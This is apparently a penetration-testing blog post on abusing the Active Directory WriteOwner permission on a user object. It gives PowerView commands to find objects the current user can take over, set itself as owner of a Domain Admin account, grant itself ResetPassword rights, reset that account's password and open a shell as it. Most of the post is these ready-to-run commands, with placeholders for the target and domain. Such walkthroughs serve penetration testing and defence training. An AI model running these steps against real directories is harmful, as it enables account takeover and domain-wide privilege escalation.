Home WriteOwner On User
Post
Cancel

WriteOwner On User

Posted 2022-06-03 1 min read

WriteOwner

WriteOwner : Is a permission that allows you to change ownership of an object. If you have WriteOwner on user object, you can make yourself the owner of that user, and if you have ownership on user object, you can give yourself a right i.e Resetpassword that will allow you to reset user’s password, thereby escalating your privileges.

Enumeration

PowerView

WriteOwner Enumeration

Get your current user’s sid by executing whoami /user, import powerview, then execute the below command to get the list of objects on which you have WriteOwner right.

Command

1
2
3


get-objectacl -resolveguids | ? {($_.securityidentifier -eq "[your_current_user_sid]") -and ($_.activedirectoryrights -like "*WriteOwner*")}

below image shows the current user usman has WriteOwner right on user object ali

userace

User Enumeration

Execute the below command to get more information about the target user.

Command

1
2
3


get-netuser [target_user]

below image shows the target user ali is a member of Domain Admins

userace

BloodHound

You can also get thesame result using bloodhound.

below image shows the current user usman has WriteOwner right on user object ali who is a member of Domain Admins

userace

Exploitation

PowerView

Change Ownership Of User

Execute the below command to give yourself ownership on the target user ali.

Command

1
2
3


set-domainobjectowner -Identity [target_user] -OwnerIdentity [Your Current User]

userace

You can verify it using bloodhound

below image shows user usman is owner of user ali

userace

You can verify it from server manager

below image shows user usman is owner of user ali

userace

Give Resetpassword Right

Since you are the owner of the user ali, you can execute the below command to give yourself Resetpassword right on the user.

Command

1
2
3


add-domainobjectacl -TargetIdentity [target_user] -PrincipalIdentity [Your Current User] -Rights Resetpassword

You can verify it using the below command.

Command

1
2
3


get-objectacl -resolveguids | ? {$_.securityidentifier -eq "[your_current_user_sid]"}

userace

Reset Password

With resetpassword right given, you can reset his password and login to his account by executing the below command

Command

1
2
3
4


$pass = ConvertTo-SecureString '[Your New Password Here]' -AsPlainText -Force
set-domainuserpassword -identity [target_user] -accountpassword $pass 
runas /user:[domain\user] cmd.exe

userace

References

Infrastructure Pentesting, Active Directory
This post is licensed under CC BY 4.0 by the author.
Recently Updated
Contents